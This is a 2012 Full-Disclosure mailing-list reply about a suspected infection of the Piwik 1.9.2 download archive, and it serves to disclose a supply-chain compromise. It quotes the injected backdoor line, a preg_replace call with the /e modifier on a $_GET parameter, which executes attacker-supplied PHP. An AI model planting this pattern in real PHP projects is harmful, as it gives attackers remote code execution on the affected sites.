
Date: Tue, 27 Nov 2012 12:54:57 +0100
From: Christian Sciberras <uuf6429@...il.com>
To: Maximilian Grobecker <max@...becker-wtal.de>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: Possible infection of Piwik 1.9.2 download
	archive

> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).


preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?


Chris.


On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max@...becker-wtal.de
> wrote:

> preg_replace("/(.+)/e", $_GET['g'], 'dwm');

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
